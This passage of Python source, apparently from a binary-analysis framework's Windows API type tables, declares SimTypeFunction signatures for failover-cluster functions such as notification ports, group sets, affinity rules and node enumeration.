'RegisterClusterNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "Filter", "hObject", "dwNotifyKey"]),
#
'GetNotifyEventHandle': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lphTargetEvent"]),
#
'GetClusterNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), offset=0), SimTypePointer(SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lpdwNotifyKey", "pFilterAndType", "buffer", "lpbBufferSize", "lpszObjectId", "lpcchObjectId", "lpszParentId", "lpcchParentId", "lpszName", "lpcchName", "lpszType", "lpcchType", "dwMilliseconds"]),
#
'CreateClusterNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), arg_names=["hChange", "hCluster", "dwFilter", "dwNotifyKey"]),
#
'RegisterClusterNotify': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "dwFilterType", "hObject", "dwNotifyKey"]),
#
'GetClusterNotify': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lpdwNotifyKey", "lpdwFilterType", "lpszName", "lpcchName", "dwMilliseconds"]),
#
'CloseClusterNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hChange"]),
#
'ClusterOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0), arg_names=["hCluster", "dwType"]),
#
'ClusterGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'ClusterEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'ClusterCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'ClusterOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "dwType", "pOptions"]),
#
'ClusterGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum"]),
#
'ClusterEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwType": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="CLUSTER_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum", "dwIndex", "pItem", "cbItem"]),
#
'ClusterCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum"]),
#
'CreateClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "groupSetName"]),
#
'OpenClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupSetName"]),
#
'CloseClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hGroupSet"]),
#
'DeleteClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet"]),
#
'ClusterAddGroupToGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hGroup"]),
#
'ClusterAddGroupToGroupSetWithDomains': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hGroup", "faultDomain", "updateDomain"]),
#
'ClusterRemoveGroupFromGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup"]),
#
'ClusterGroupSetControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'AddClusterGroupDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroup", "hProviderGroup"]),
#
'SetGroupDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "lpszDependencyExpression"]),
#
'RemoveClusterGroupDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDependsOn"]),
#
'AddClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "hProviderGroupSet"]),
#
'SetClusterGroupSetDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "lpszDependencyExprssion"]),
#
'RemoveClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hDependsOn"]),
#
'AddClusterGroupToGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroup", "hProviderGroupSet"]),
#
'RemoveClusterGroupToGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDependsOn"]),
#
'ClusterGroupSetOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0), arg_names=["hCluster"]),
#
'ClusterGroupSetGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum"]),
#
'ClusterGroupSetEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum", "dwIndex", "lpszName", "lpcchName"]),
#
'ClusterGroupSetCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum"]),
#
'AddCrossClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "lpRemoteClusterName", "lpRemoteGroupSetName"]),
#
'RemoveCrossClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "lpRemoteClusterName", "lpRemoteGroupSetName"]),
#
'CreateClusterAvailabilitySet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwUpdateDomains": SimTypeInt(signed=False, label="UInt32"), "dwFaultDomains": SimTypeInt(signed=False, label="UInt32"), "bReserveSpareNode": SimTypeInt(signed=True, label="Int32")}, name="CLUSTER_AVAILABILITY_SET_CONFIG", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "lpAvailabilitySetName", "pAvailabilitySetConfig"]),
#
'ClusterNodeReplacement': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNodeNameCurrent", "lpszNodeNameNew"]),
#
'ClusterCreateAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="CLUS_AFFINITY_RULE_TYPE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "ruleType"]),
#
'ClusterRemoveAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName"]),
#
'ClusterAddGroupToAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "hGroup"]),
#
'ClusterRemoveGroupFromAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "hGroup"]),
#
'ClusterAffinityRuleControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "affinityRuleName", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'OpenClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName"]),
#
'OpenClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'OpenClusterNodeById': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "nodeId"]),
#
'CloseClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hNode"]),
#
'GetClusterNodeState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="CLUSTER_NODE_STATE"), arg_names=["hNode"]),
#
'GetClusterNodeId': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "lpszNodeId", "lpcchName"]),
#
'GetClusterFromNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hNode"]),
#
'PauseClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'ResumeClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'EvictClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'ClusterNetInterfaceOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "lpszNetworkName"]),
#
'ClusterNetInterfaceEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterfaceEnum", "dwIndex", "lpszName", "lpcchName"]),
#
'ClusterNetInterfaceCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterfaceEnum"]),
#
'ClusterNodeOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0), arg_names=["hNode", "dwType"]),
#
'ClusterNodeOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0), arg_names=["hNode", "dwType", "pOptions"]),
#
'ClusterNodeGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwType": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="CLUSTER_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum", "dwIndex", "pItem", "cbItem"]),
#
'ClusterNodeCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'EvictClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "dwTimeOut", "phrCleanupStatus"]),
#
'GetClusterResourceTypeKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hCluster", "lpszTypeName", "samDesired"]),
#
'CreateClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName"]),
#
'OpenClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName"]),
#
'OpenClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'PauseClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "bDrainNode", "dwPauseFlags", "hNodeDrainTarget"]),
#
'ResumeClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="CLUSTER_NODE_RESUME_FAILBACK_TYPE"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "eResumeFailbackType", "dwResumeFlagsReserved"]),
#
'CreateClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "groupType": SimTypeInt(signed=False, label="CLUSGROUP_TYPE")}, name="CLUSTER_CREATE_GROUP_INFO", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName", "pGroupInfo"]),
#
'ClusterGroupOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszProperties", "cbProperties", "lpszRoProperties", "cbRoProperties", "dwFlags"]),
#
'ClusterGroupGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx"]),
#
'ClusterGroupEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "state": SimTypeInt(signed=False, label="CLUSTER_GROUP_STATE"), "cbOwnerNode": SimTypeInt(signed=False, label="UInt32"), "lpszOwnerNode": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "cbProperties": SimTypeInt(signed=False, label="UInt32"), "pProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0), "cbRoProperties": SimTypeInt(signed=False, label="UInt32"), "pRoProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CLUSTER_GROUP_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx", "dwIndex", "pItem", "cbItem"]),
#
'ClusterGroupCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx"]),
#
'ClusterResourceOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszProperties", "cbProperties", "lpszRoProperties", "cbRoProperties", "dwFlags"]),
#
'ClusterResourceGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResourceEnumEx"]),
#
